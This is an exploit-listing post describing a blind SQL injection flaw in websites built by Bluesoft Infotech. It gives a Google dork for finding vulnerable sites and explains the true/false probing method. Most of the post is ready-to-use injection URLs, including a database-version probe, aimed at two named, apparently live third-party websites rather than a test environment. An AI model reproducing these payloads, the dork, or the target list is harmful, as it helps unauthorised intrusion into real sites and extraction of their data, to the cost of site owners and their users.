********************************************************* #Exploit Title: Bluesoft Infotech - Blind Sql Injection Vulnerability #Date: 2024-07-05 #Exploit Author: Behrouz Mansoori #Google Dork: "Designed by Bluesoft Infotech" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.blackbullfitnessstudio.com/class-details.php?id=1%27%20and%20true--+ * https://www.blackbullfitnessstudio.com/class-details.php?id=1%27%20and%20false--+ * https://www.blackbullfitnessstudio.com/class-details.php?id=1%27%20and%20substring(@@version,1,1)=5--+ ### Demo 2: * https://www.sanggavais.in/properties-details.php?id=17%20and%20true-- * https://www.sanggavais.in/properties-details.php?id=17%20and%20false-- * https://www.sanggavais.in/properties-details.php?id=17%20and%20substring(@@version,1,1)=5-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************